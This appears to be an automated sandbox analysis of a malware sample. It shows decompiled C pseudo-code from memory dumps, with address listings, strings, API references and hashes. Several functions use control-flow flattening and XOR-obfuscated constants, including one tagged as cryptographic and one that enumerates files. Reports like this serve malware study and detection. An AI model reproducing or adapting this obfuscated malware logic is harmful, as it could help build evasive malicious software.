				_v40 = _v40 ^ 0x00452141;
				while(1) {
					L1:
					while(1) {
						_t757 = 0xdd2a505;
						do {
							while(1) {
								L3:
								_t801 = _t694 - 0x81118f1;
								if(_t801 <= 0) {
									break;
								}
								__eflags = _t694 - 0x9c13901;
								if(_t694 == 0x9c13901) {
									_t694 = 0x1bf6072;
									goto L26;
								} else {
									__eflags = _t694 - 0xb8b45fb;
									if(__eflags == 0) {
										_push(0x4721838);
										_push(_v224);
										_t678 = E04725027(_v56, _v64, _v208,  &_v8, _v16, _v72,  &_v4, _v216, _v80, E04737AF5(_v88, _v92, __eflags));
										_t798 = _t798 + 0x2c;
										__eflags = _t678 - _v48;
										_t694 =  ==  ? 0x7c079bb : _t774;
										E047263E1(_v192, _t675, _v200, _v116);
										L24:
										_t702 = _v168;
										_t793 = 0xe7dfced;
										_t673 = 0x3f20f45;
										_t757 = 0xdd2a505;
										goto L26;
									} else {
										__eflags = _t694 - _t757;
										if(_t694 == _t757) {
											_t682 = E0472EFB3(_t702, _v240, _v248, _v256, _v124, _v20, _a20, _v264);
											_t798 = _t798 + 0x18;
											__eflags = _t682 - _v232;
											_t702 = _v168;
											_t673 = 0x3f20f45;
											_t694 =  ==  ? 0x3f20f45 : 0x1d3b988;
											_t757 = 0xdd2a505;
											continue;
										} else {
											__eflags = _t694 - _t793;
											if(_t694 != _t793) {
												goto L26;
											} else {
												_t692 = E047392B4(_v12, _v52,  &_v20, _v24, _v132, _v8, _v16, _t702, _v60, _v140, _v36, _v148);
												_t798 = _t798 + 0x28;
												__eflags = _t692 - _v272;
												_t757 = 0xdd2a505;
												_t702 = _v168;
												_t673 = 0x3f20f45;
												_t694 =  ==  ? 0xdd2a505 : 0x81118f1;
												continue;
											}
										}
									}
								}
								L29:
								return _t796;
							}
							if(_t801 == 0) {
								E0472CE30(_v12, _v276, _v196, _v228, _v68);
								_t798 = _t798 + 0xc;
								_t694 = _t774;
								goto L12;
							} else {
								if(_t694 == 0x1bf6072) {
									_push(0x4721808);
									_push(_v212);
									_t665 = E04737AF5(_v96, _v152, __eflags);
									_push(0x47217a8);
									_push(_v252);
									__eflags = E04721C20(_v204, _v164,  &_v16, _v76, _t665, _v144, _v244, E04737AF5(_v112, _v188, __eflags)) - _v136;
									_t694 =  ==  ? 0xb8b45fb : 0xc6657a2;
									E047263E1(_v236, _t665, _v160, _v104);
									E047263E1(_v156, _t666, _v32, _v172);
									_t798 = _t798 + 0x38;
									_t774 = 0x3a4ed12;
									goto L24;
								} else {
									if(_t694 == 0x1d3b988) {
										E0473ABB2(_v260, _v128, _v20);
										_t694 = 0x81118f1;
										goto L11;
									} else {
										if(_t694 == _t774) {
											E047257C8(_v16, _v100, _v176, _v184, _v108, _v40);
										} else {
											if(_t694 == _t673) {
												_t686 = E047360A4(_v120, _v180, _v268, _a4, 0x20, _v20, _v28);
												_t798 = _t798 + 0x14;
												_t694 = 0x1d3b988;
												__eflags = _t686 - _v84;
												_t796 =  ==  ? 1 : _t796;
												goto L12;
											} else {
												if(_t694 != 0x7c079bb) {
													goto L26;
												} else {
													_push(_t702);
													_v12 = E04735A10(_v8);
													_t694 =  !=  ? _t793 : _t774;
													L11:
													L12:
													_t702 = _v168;
													goto L1;
												}
											}
										}
									}
								}
							}
							goto L29;
							L26:
							__eflags = _t694 - 0xc6657a2;
						} while (__eflags != 0);
						goto L29;
					}
				}
			}

0x04742a82
0x04742a89
0x04742a90
0x04742a97
0x04742a9e
0x04742aa5
0x04742aac
0x04742aae
0x04742aaf
0x04742ab4
0x04742abf
0x04742acb
0x04742acd
0x04742ad4
0x04742ad9
0x04742ae2
0x04742aed
0x04742b00
0x04742b03
0x04742b12
0x04742b19
0x04742b24
0x04742b2c
0x04742b34
0x04742b39
0x04742b41
0x04742b4c
0x04742b57
0x04742b62
0x04742b75
0x04742b87
0x04742b8e
0x04742b99
0x04742ba4
0x04742baf
0x04742bba
0x04742bc5
0x04742bcd
0x04742bd6
0x04742bd9
0x04742bdd
0x04742be5
0x04742bed
0x04742bf5
0x04742bfa
0x04742c07
0x04742c0b
0x04742c13
0x04742c1b
0x04742c23
0x04742c2b
0x04742c33
0x04742c3b
0x04742c43
0x04742c48
0x04742c50
0x04742c58
0x04742c63
0x04742c6e
0x04742c79
0x04742c81
0x04742c91
0x04742c96
0x04742ca0
0x04742ca5
0x04742cab
0x04742cb3
0x04742cbe
0x04742cc6
0x04742cd1
0x04742cdc
0x04742ce7
0x04742cf2
0x04742cfd
0x04742d05
0x04742d0d
0x04742d17
0x04742d1a
0x04742d1e
0x04742d26
0x04742d31
0x04742d3c
0x04742d44
0x04742d4f
0x04742d57
0x04742d67
0x04742d6f
0x04742d74
0x04742d7a
0x04742d82
0x04742d8a
0x04742d92
0x04742d9b
0x04742da0
0x04742da6
0x04742dae
0x04742dbb
0x04742dbe
0x04742dc2
0x04742dca
0x04742dd2
0x04742dda
0x04742de5
0x04742ded
0x04742df8
0x04742e03
0x04742e0e
0x04742e22
0x04742e29
0x04742e34
0x04742e3c
0x04742e4b
0x04742e53
0x04742e58
0x04742e5e
0x04742e66
0x04742e6e
0x04742e76
0x04742e83
0x04742e86
0x04742e8a
0x04742e92
0x04742e9d
0x04742ea8
0x04742eb0
0x04742ebb
0x04742ec6
0x04742ed1
0x04742edc
0x04742ee7
0x04742ef2
0x04742f05
0x04742f0c
0x04742f17
0x04742f22
0x04742f2d
0x04742f38
0x04742f4b
0x04742f52
0x04742f5d
0x04742f65
0x04742f70
0x04742f7b
0x04742f86
0x04742f91
0x04742f9c
0x04742fa7
0x04742fb2
0x04742fba
0x04742fc2
0x04742fca
0x04742fd2
0x04742fda
0x04742fe5
0x04742ff0
0x04742ffb
0x04743006
0x04743011
0x0474301c
0x04743024
0x04743031
0x04743035
0x0474303d
0x04743045
0x04743050
0x0474305b
0x04743066
0x04743071
0x0474307c
0x04743087
0x0474308f
0x04743094
0x0474309c
0x047430a1
0x047430a9
0x047430b1
0x047430b9
0x047430c1
0x047430c9
0x047430d1
0x047430e7
0x047430f5
0x047430fa
0x04743103
0x0474310e
0x04743121
0x04743124
0x0474312b
0x04743136
0x04743143
0x04743147
0x04743157
0x0474315b
0x04743163
0x0474316e
0x04743179
0x04743184
0x0474318f
0x0474319a
0x047431a5
0x047431b0
0x047431bb
0x047431c6
0x047431d1
0x047431d9
0x047431e4
0x047431ef
0x047431fa
0x04743205
0x04743210
0x04743218
0x0474321d
0x04743225
0x0474322d
0x04743235
0x0474323d
0x04743246
0x0474324b
0x04743255
0x0474325a
0x04743260
0x04743268
0x04743273
0x0474327e
0x04743286
0x04743291
0x04743299
0x047432a5
0x047432aa
0x047432b0
0x047432b5
0x047432bd
0x047432c8
0x047432d0
0x047432d8
0x047432e3
0x047432ef
0x047432f2
0x047432f6
0x047432fb
0x04743303
0x04743308
0x04743310
0x04743315
0x04743320
0x0474332b
0x04743336
0x0474333e
0x04743343
0x0474334b
0x04743350
0x04743358
0x04743363
0x0474336b
0x04743373
0x0474337e
0x0474338b
0x0474338f
0x04743397
0x0474339f
0x047433ac
0x047433b0
0x047433b8
0x047433c0
0x047433c8
0x047433d0
0x047433d5
0x047433da
0x047433df
0x047433e7
0x047433fa
0x04743401
0x0474340c
0x04743417
0x04743422
0x0474342d
0x04743438
0x04743440
0x04743445
0x0474344d
0x04743455
0x0474345d
0x04743470
0x04743477
0x0474347f
0x0474348a
0x04743495
0x0474349c
0x047434a7
0x047434a7
0x047434ac
0x047434ac
0x047434b1
0x047434b1
0x047434b1
0x047434b1
0x047434b7
0x00000000
0x00000000
0x04743675
0x0474367b
0x0474380f
0x00000000
0x04743681
0x04743681
0x04743687
0x04743768
0x0474376d
0x047437c2
0x047437c7
0x047437d5
0x047437e5
0x047437f0
0x047437f7
0x047437f7
0x047437fe
0x04743803
0x04743808
0x00000000
0x0474368d
0x0474368d
0x0474368f
0x0474373f
0x04743746
0x04743752
0x04743754
0x0474375b
0x04743760
0x047434ac
0x00000000
0x04743695
0x04743695
0x04743697
0x00000000
0x0474369d
0x047436ec
0x047436f3
0x047436ff
0x04743701
0x04743706
0x0474370d
0x04743712
0x00000000
0x04743712
0x04743697
0x0474368f
0x04743687
0x04743853
0x0474385d
0x0474385d
0x047434bd
0x04743666
0x0474366b
0x0474366e
0x00000000
0x047434c3
0x047434c9
0x0474358a
0x0474358f
0x047435a1
0x047435a6
0x047435ab
0x04743609
0x0474361b
0x0474361e
0x0474363a
0x0474363f
0x04743642
0x00000000
0x047434cf
0x047434d5
0x0474357e
0x04743583
0x00000000
0x047434db
0x047434dd
0x04743849
0x047434e3
0x047434e5
0x0474354c
0x0474355d
0x04743560
0x04743565
0x04743567
0x00000000
0x047434e7
0x047434ed
0x00000000
0x047434f3
0x04743505
0x0474350d
0x04743516
0x04743519
0x0474351a
0x0474351a
0x00000000
0x0474351a
0x047434ed
0x047434e5
0x047434dd
0x047434d5
0x047434c9
0x00000000
0x04743814
0x04743814
0x04743814
0x00000000
0x04743820
0x047434ac

Strings

"7, xrefs: 04742B62
Yr, xrefs: 04742E76
q#, xrefs: 04742BDD
A!E, xrefs: 0474349C
6}[>, xrefs: 04742BBA
A!E4, xrefs: 04743119
L:, xrefs: 04743273
2A, xrefs: 047433B8
?g, xrefs: 04742BC5
oIG", xrefs: 04742F0C
bu^, xrefs: 04742E6E
A,, xrefs: 04743066

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: A,$2A$6}[>$?g$A!E$A!E4$L:$Yr$bu^$oIG"$q#$"7
API String ID: 0-2545526808
Opcode ID: 076795070bc5bf32b068b9a91f909f3b55ee078ad57324af74fee65f6ef558fe
Instruction ID: 7a0458b7d2e3512286e7d46e2cc7c356cea112a72978d43f6a65b90a78389936
Opcode Fuzzy Hash: 076795070bc5bf32b068b9a91f909f3b55ee078ad57324af74fee65f6ef558fe
Instruction Fuzzy Hash: 2E621F716093808FD378CF65C58AB9BBBE2FBC4714F10891DE68A86260D7B19949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10004E7C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106
filestringCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E10004E7C(void* __ecx, void* __edx, void* __eflags, CHAR* _a4) {
				signed int _v8;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				char _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				void* _t25;
				void* _t27;
				void* _t38;
				long _t42;
				CHAR* _t45;
				void* _t46;
				void* _t56;
				void* _t58;
				void* _t60;
				void* _t63;
				signed int _t68;

				_t56 = __edx;
				_t66 = _t68;
				_t18 =  *0x10031c30; // 0x1f496801
				_v8 = _t18 ^ _t68;
				_t45 = _a4;
				_t58 = __ecx;
				E100049BA(__ecx);
				_t75 = _t45;
				if(_t45 != 0) {
					__eflags = lstrlenA(_t45) - 0x104;
					if(__eflags < 0) {
						goto L3;
					} else {
						_push(0xa0);
						goto L7;
					}
				} else {
					_t45 = 0x100278c0;
					L3:
					 *(_t58 + 8) = E10003B46(_t75, 0x140);
					E10004AE2(_t45, _t56, _t58, 0x104, _t22 + 0x2c, 0x104, _t45);
					_t25 = FindFirstFileA(_t45,  *(_t58 + 8));
					 *(_t58 + 0xc) = _t25;
					if(_t25 != 0xffffffff) {
						_t48 = _t58 + 0x10;
						_v272 = _t58 + 0x10;
						_v268 = E10004078(_t58 + 0x10, 0x104);
						_t27 = E10015B56(_t58 + 0x10, _t56, _t26, _t45, 0x104);
						__eflags = _t27;
						if(_t27 != 0) {
							E10004908(_t45, _t48, 0, 0x104, E10015587(_t48, _t56, _v268,  &_v276, 3,  &_v264, 0x100, 0, 0, 0, 0));
							E10004908(_t45, _t48, 0, 0x104, E10015786(_t48, _t56, _v268, 0x104,  &_v276,  &_v264, 0, 0));
							E10003EB1(_v272, 0xffffffff);
							_t38 = 1;
							__eflags = 1;
						} else {
							_push(_t27);
							E1000205C(_v272);
							E100049BA(_t58);
							_push(0x7b);
							goto L7;
						}
					} else {
						_t42 = GetLastError();
						E100049BA(_t58);
						_push(_t42);
						L7:
						SetLastError();
						_t38 = 0;
					}
				}
				_pop(_t60);
				_pop(_t63);
				_pop(_t46);
				return E100127FF(_t38, _t46, _v8 ^ _t66, _t56, _t60, _t63);
			}

0x10004e7c
0x10004e7f
0x10004e87
0x10004e8e
0x10004e92
0x10004e97
0x10004e99
0x10004ea3
0x10004ea5
0x10004ef2
0x10004ef4
0x00000000
0x10004ef6
0x10004ef6
0x00000000
0x10004ef6
0x10004ea7
0x10004ea7
0x10004eac
0x10004eb7
0x10004ebf
0x10004ecb
0x10004ed1
0x10004ed7
0x10004f08
0x10004f0c
0x10004f1a
0x10004f20
0x10004f28
0x10004f2a
0x10004f6a
0x10004f8f
0x10004f9d
0x10004fa4
0x10004fa4
0x10004f2c
0x10004f32
0x10004f33
0x10004f3a
0x10004f3f
0x00000000
0x10004f3f
0x10004ed9
0x10004ed9
0x10004ee3
0x10004ee8
0x10004efb
0x10004efb
0x10004f01
0x10004f01
0x10004ed7
0x10004fa8
0x10004fa9
0x10004fac
0x10004fb3

APIs

FindFirstFileA.KERNEL32(?,?), ref: 10004ECB
GetLastError.KERNEL32 ref: 10004ED9
lstrlenA.KERNEL32(?), ref: 10004EEC
SetLastError.KERNEL32(0000007B,00000000,?,?,00000104), ref: 10004EFB

Part of subcall function 10003B46: _malloc.LIBCMT ref: 10003B64

Part of subcall function 10004AE2: _strcpy_s.LIBCMT ref: 10004AF0

__fullpath.LIBCMT ref: 10004F20
__splitpath_s.LIBCMT ref: 10004F64
__makepath_s.LIBCMT ref: 10004F86

Strings

*.*, xrefs: 10004EA7, 10004EB6, 10004ECA

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FileFindFirst__fullpath__makepath_s__splitpath_s_malloc_strcpy_slstrlen
String ID: *.*
API String ID: 23357613-438819550
Opcode ID: dce836868c73ee46207ab6eb0ee372d38f0c3321efe7884fb105cdf262c3d383
Instruction ID: 58b7f96db7d411d1db12b1ed4a2f24c8828fef3d4c238ce82a804ac7923f2152
Opcode Fuzzy Hash: dce836868c73ee46207ab6eb0ee372d38f0c3321efe7884fb105cdf262c3d383
Instruction Fuzzy Hash: D23104B6900218BBE720EB71CC86EDFB7ACFF59390F0105A5F519D2185DF74A9808AA4

Uniqueness

Uniqueness Score: -1.00%

Function 04726B58, Relevance: 12.9, Strings: 10, Instructions: 427
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04726B58(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				unsigned int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				void* _t406;
				void* _t435;
				void* _t441;
				intOrPtr _t450;
				void* _t454;
				char _t456;
				void* _t468;
				char _t469;
				void* _t472;
				intOrPtr _t481;
				intOrPtr _t512;
				signed int _t519;
				void* _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				char _t532;
				signed int* _t535;
				void* _t539;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0472DD01(_t406);
				_v276 = 0x21c88b;
				_v272 = 0x1781e2;
				_t535 =  &(( &_v460)[8]);
				_v268 = 0;
				_v264 = 0;
				_t472 = 0x6f9a88b;
				_v372 = 0xd9288c;
				_t469 = 0;
				_v372 = _v372 ^ 0x566f6f5e;
				_v372 = _v372 ^ 0x56b4f7a1;
				_v416 = 0xbc68dd;
				_v416 = _v416 + 0xffffcc94;
				_t523 = 0x29;
				_v416 = _v416 / _t523;
				_v416 = _v416 ^ 0x25822646;
				_v416 = _v416 ^ 0x258cdf43;
				_v332 = 0xf4ea3;
				_v332 = _v332 + 0xc7f5;
				_v332 = _v332 ^ 0x001bd07f;
				_v408 = 0xfd921c;
				_v408 = _v408 | 0x99400dcc;
				_v408 = _v408 << 6;
				_v408 = _v408 ^ 0x7f6e3b29;
				_v432 = 0x7906e2;
				_v432 = _v432 ^ 0x8785d183;
				_v432 = _v432 >> 1;
				_t524 = 0x3a;
				_v432 = _v432 / _t524;
				_v432 = _v432 ^ 0x0128a3b4;
				_v440 = 0x70e632;
				_t55 =  &_v440; // 0x70e632
				_t525 = 0x65;
				_v440 =  *_t55 / _t525;
				_v440 = _v440 | 0xdbe70ffe;
				_v440 = _v440 ^ 0xdbefac46;
				_v384 = 0x3b4fd6;
				_v384 = _v384 * 0x7e;
				_v384 = _v384 + 0xc462;
				_v384 = _v384 ^ 0x1d3fdacb;
				_v344 = 0xcc2688;
				_v344 = _v344 + 0x5433;
				_v344 = _v344 ^ 0x03650013;
				_v344 = _v344 ^ 0x03a81201;
				_v444 = 0xf5983a;
				_v444 = _v444 + 0x6404;
				_v444 = _v444 * 0x41;
				_v444 = _v444 >> 1;
				_v444 = _v444 ^ 0x1f336955;
				_v304 = 0x9dfaf8;
				_v304 = _v304 | 0x4fdab733;
				_v304 = _v304 ^ 0x4fdd9ae5;
				_v388 = 0xd7449e;
				_v388 = _v388 << 0xf;
				_v388 = _v388 >> 0xd;
				_v388 = _v388 ^ 0x00013242;
				_v356 = 0x92c600;
				_t519 = 0x2f;
				_v356 = _v356 / _t519;
				_t526 = 0x2d;
				_v356 = _v356 * 0x62;
				_v356 = _v356 ^ 0x01302e50;
				_v396 = 0x859fa9;
				_v396 = _v396 / _t526;
				_v396 = _v396 << 0xe;
				_v396 = _v396 ^ 0xbe025d9a;
				_v316 = 0xfa45b2;
				_v316 = _v316 << 5;
				_v316 = _v316 ^ 0x1f4ec2c3;
				_v452 = 0x30c459;
				_v452 = _v452 << 3;
				_v452 = _v452 >> 0xe;
				_v452 = _v452 ^ 0x7148f319;
				_v452 = _v452 ^ 0x71479d0e;
				_v324 = 0xa7bc32;
				_t527 = 0x6e;
				_v324 = _v324 * 0x6f;
				_v324 = _v324 ^ 0x48bd2ba7;
				_v352 = 0x41a0e;
				_v352 = _v352 << 5;
				_v352 = _v352 + 0x637;
				_v352 = _v352 ^ 0x00861a09;
				_v340 = 0xd06da;
				_v340 = _v340 / _t519;
				_v340 = _v340 ^ 0x000f9b85;
				_v436 = 0xb19cc8;
				_v436 = _v436 << 3;
				_v436 = _v436 | 0xf67d9f7f;
				_v436 = _v436 ^ 0xf7f979fb;
				_v400 = 0x9dc3f9;
				_v400 = _v400 >> 0xf;
				_v400 = _v400 >> 8;
				_v400 = _v400 ^ 0x000ac1d0;
				_v320 = 0x1baef7;
				_v320 = _v320 + 0xffffe4ff;
				_v320 = _v320 ^ 0x001ad0b3;
				_v312 = 0x187169;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 ^ 0x00016baf;
				_v328 = 0xe82347;
				_v328 = _v328 + 0x439c;
				_v328 = _v328 ^ 0x00eb7b2d;
				_v360 = 0xb55f4e;
				_v360 = _v360 ^ 0xb66c8e9b;
				_v360 = _v360 >> 0xf;
				_v360 = _v360 ^ 0x0005b48e;
				_v424 = 0x931e96;
				_v424 = _v424 ^ 0x43974a12;
				_v424 = _v424 >> 5;
				_v424 = _v424 / _t527;
				_v424 = _v424 ^ 0x000c5844;
				_v368 = 0x1df62b;
				_v368 = _v368 | 0xc29e16a8;
				_v368 = _v368 ^ 0x567f42ce;
				_v368 = _v368 ^ 0x94e943dc;
				_v376 = 0xe9004e;
				_v376 = _v376 + 0x7977;
				_v376 = _v376 * 0x42;
				_v376 = _v376 ^ 0x3c37e9f1;
				_v428 = 0xf8bce6;
				_v428 = _v428 << 0xe;
				_v428 = _v428 >> 8;
				_t528 = 0x1e;
				_v428 = _v428 / _t528;
				_v428 = _v428 ^ 0x000b073b;
				_v380 = 0x57d06c;
				_v380 = _v380 ^ 0xafc2f96e;
				_v380 = _v380 ^ 0xe0cc05ec;
				_v380 = _v380 ^ 0x4f53f9a7;
				_v308 = 0xf59bb9;
				_v308 = _v308 | 0x9e3d8ea7;
				_v308 = _v308 ^ 0x9efcb46e;
				_v364 = 0xd3ad4b;
				_v364 = _v364 >> 5;
				_v364 = _v364 + 0xffffccb5;
				_v364 = _v364 ^ 0x0006e626;
				_v448 = 0xaa65c;
				_t529 = 0x43;
				_v448 = _v448 * 0x6b;
				_v448 = _v448 ^ 0x9b9aa577;
				_v448 = _v448 * 0x27;
				_v448 = _v448 ^ 0x5c886236;
				_v348 = 0x9974a4;
				_v348 = _v348 >> 7;
				_v348 = _v348 ^ 0xe79b935d;
				_v348 = _v348 ^ 0xe7962ded;
				_v456 = 0xace5e8;
				_v456 = _v456 + 0x35eb;
				_v456 = _v456 | 0x19620cfd;
				_v456 = _v456 / _t529;
				_v456 = _v456 ^ 0x0064607c;
				_v460 = 0x68fa69;
				_v460 = _v460 + 0xfffff1de;
				_v460 = _v460 | 0x897c0efe;
				_v460 = _v460 + 0x7016;
				_v460 = _v460 ^ 0x8978429e;
				_v392 = 0xd8e0cf;
				_v392 = _v392 + 0xf709;
				_t530 = 0x45;
				_v392 = _v392 / _t530;
				_v392 = _v392 ^ 0x00038e1e;
				_v336 = 0xad0053;
				_v336 = _v336 | 0x5794d22a;
				_v336 = _v336 ^ 0x57b99d16;
				_v412 = 0x8de257;
				_v412 = _v412 | 0x102066d0;
				_v412 = _v412 ^ 0x7b6e4a1d;
				_v412 = _v412 ^ 0x6bc8080a;
				_v404 = 0x9e5615;
				_v404 = _v404 + 0x2150;
				_v404 = _v404 >> 0xb;
				_v404 = _v404 ^ 0x00070f9d;
				_v420 = 0x95b452;
				_v420 = _v420 + 0xffffc6b3;
				_v420 = _v420 + 0xffff32e6;
				_v420 = _v420 >> 0xf;
				_v420 = _v420 ^ 0x00000529;
				while(1) {
					L1:
					_t435 = 0x4d7df69;
					do {
						while(1) {
							L2:
							_t539 = _t472 - _t435;
							if(_t539 > 0) {
								break;
							}
							if(_t539 == 0) {
								E04735E82(E0473E813(0x40, 1), _v304, 0xb,  &_v260, _v388, _v356, _v396);
								_t535 =  &(_t535[7]);
								_t472 = 0x4b45f2d;
								while(1) {
									L1:
									_t435 = 0x4d7df69;
									goto L2;
								}
							} else {
								if(_t472 == 0xcabeec) {
									_t481 =  *0x47461f8;
									_t450 =  *((intOrPtr*)( *((intOrPtr*)(_t481 + 0x30)) + 0x14));
									 *((intOrPtr*)(_t481 + 8)) =  *((intOrPtr*)(_t481 + 8)) + 1;
									_t512 =  *((intOrPtr*)(_t481 + 8));
									 *((intOrPtr*)(_t481 + 0x30)) = _t450;
									if(_t450 == 0) {
										 *((intOrPtr*)(_t481 + 0x30)) =  *((intOrPtr*)(_t481 + 0x20));
									}
									if(_t512 >=  *((intOrPtr*)( *0x47461f8 + 0x28))) {
										 *((intOrPtr*)( *0x47461f8 + 8)) = 0;
									} else {
										_t472 = 0x6f9a88b;
										while(1) {
											L1:
											_t435 = 0x4d7df69;
											goto L2;
										}
									}
								} else {
									if(_t472 == 0x4115b8e) {
										_t454 = E0472AFF0(_v320, _a8, _v312,  &_v284, _v328);
										_t535 =  &(_t535[3]);
										if(_t454 != 0) {
											_t522 = 0x2dbd48e;
											_t469 = 1;
										}
										_t472 = 0x93914c7;
										while(1) {
											L1:
											_t435 = 0x4d7df69;
											goto L2;
										}
									} else {
										if(_t472 == 0x477de17) {
											if(_v296 >= _v420) {
												_t456 = E0472A34E( &_v300,  &_v292);
											} else {
												_t456 = E04735406( &_v300);
											}
											_t532 = _t456;
											_t435 = 0x4d7df69;
											_t472 =  !=  ? 0x4d7df69 : 0xd1cb161;
											continue;
										} else {
											if(_t472 != 0x4b45f2d) {
												goto L35;
											} else {
												_t468 = E04722735(_v316,  &_v292,  *( *((intOrPtr*)( *0x47461f8 + 0x30)) + 0x34) & 0x0000ffff,  &_v260,  &_v284, _v452, _v324,  *((intOrPtr*)( *0x47461f8 + 0x30)) + 0x40, _v352, _v340, _t532, _v436,  *( *((intOrPtr*)( *0x47461f8 + 0x30)) + 0xc) & 0x0000ffff, _v400);
												_t535 =  &(_t535[0xc]);
												if(_t468 == 0) {
													_t522 = 0xcabeec;
													L11:
													_t472 = 0xd1cb161;
													while(1) {
														L1:
														_t435 = 0x4d7df69;
														goto L2;
													}
												} else {
													_t472 = 0x4115b8e;
													while(1) {
														L1:
														_t435 = 0x4d7df69;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L38:
							return _t469;
						}
						if(_t472 == 0x6f9a88b) {
							_t532 = 0;
							E0472E545(_v372, _v416, _v332, 0x100, _v408,  &_v260);
							_t535 =  &(_t535[4]);
							_v292 = 0;
							_v288 = 0;
							_t472 = 0xa37e174;
							_v300 = 0;
							_v296 = 0;
							goto L34;
						} else {
							if(_t472 == 0x93914c7) {
								E0472CE30(_v284, _v360, _v424, _v368, _v376);
								_t535 =  &(_t535[3]);
								goto L11;
							} else {
								if(_t472 == 0xa37e174) {
									_t441 = E04738996(_a12, _v432,  &_v300, _v440, _a20, _v384);
									_t535 =  &(_t535[4]);
									if(_t441 != 0) {
										_t472 = 0x477de17;
										goto L1;
									}
								} else {
									if(_t472 == 0xd1cb161) {
										E0472CE30(_v300, _v428, _v380, _v308, _v364);
										E0472CE30(_t532, _v448, _v348, _v456, _v460);
										E0472CE30(_v292, _v392, _v336, _v412, _v404);
										_t535 =  &(_t535[9]);
										_t472 = _t522;
										L34:
										_t435 = 0x4d7df69;
									}
									goto L35;
								}
							}
						}
						goto L38;
						L35:
					} while (_t472 != 0x2dbd48e);
					goto L38;
				}
			}

0x04726b62
0x04726b69
0x04726b70
0x04726b77
0x04726b7e
0x04726b85
0x04726b8c
0x04726b8d
0x04726b8e
0x04726b93
0x04726ba0
0x04726bab
0x04726bae
0x04726bb7
0x04726bbe
0x04726bc3
0x04726bcb
0x04726bcd
0x04726bd5
0x04726bdd
0x04726be5
0x04726bf3
0x04726bf8
0x04726bfe
0x04726c06
0x04726c0e
0x04726c19
0x04726c24
0x04726c2f
0x04726c37
0x04726c3f
0x04726c44
0x04726c4c
0x04726c54
0x04726c5c
0x04726c64
0x04726c69
0x04726c6f
0x04726c77
0x04726c7f
0x04726c83
0x04726c86
0x04726c8a
0x04726c92
0x04726c9a
0x04726ca7
0x04726cab
0x04726cb3
0x04726cbb
0x04726cc6
0x04726cd1
0x04726cdc
0x04726ce7
0x04726cef
0x04726cfc
0x04726d00
0x04726d04
0x04726d0c
0x04726d17
0x04726d22
0x04726d2d
0x04726d35
0x04726d3a
0x04726d3f
0x04726d49
0x04726d57
0x04726d5c
0x04726d67
0x04726d6a
0x04726d6e
0x04726d76
0x04726d86
0x04726d8a
0x04726d8f
0x04726d97
0x04726da2
0x04726daa
0x04726db5
0x04726dbd
0x04726dc2
0x04726dc7
0x04726dcf
0x04726dd7
0x04726dea
0x04726deb
0x04726df2
0x04726dfd
0x04726e05
0x04726e0a
0x04726e12
0x04726e1a
0x04726e30
0x04726e37
0x04726e42
0x04726e4a
0x04726e4f
0x04726e57
0x04726e5f
0x04726e67
0x04726e6c
0x04726e71
0x04726e79
0x04726e84
0x04726e8f
0x04726e9a
0x04726ea5
0x04726ead
0x04726eb8
0x04726ec3
0x04726ece
0x04726ed9
0x04726ee1
0x04726ee9
0x04726eee
0x04726ef6
0x04726efe
0x04726f06
0x04726f11
0x04726f15
0x04726f1d
0x04726f25
0x04726f2d
0x04726f35
0x04726f3d
0x04726f45
0x04726f52
0x04726f56
0x04726f60
0x04726f68
0x04726f6d
0x04726f78
0x04726f7d
0x04726f83
0x04726f8b
0x04726f93
0x04726f9b
0x04726fa3
0x04726fab
0x04726fb6
0x04726fc1
0x04726fcc
0x04726fd4
0x04726fd9
0x04726fe1
0x04726fe9
0x04726ff6
0x04726ffd
0x04727001
0x0472700e
0x04727012
0x0472701a
0x04727025
0x0472702d
0x04727038
0x04727043
0x0472704b
0x04727053
0x04727063
0x04727067
0x0472706f
0x04727077
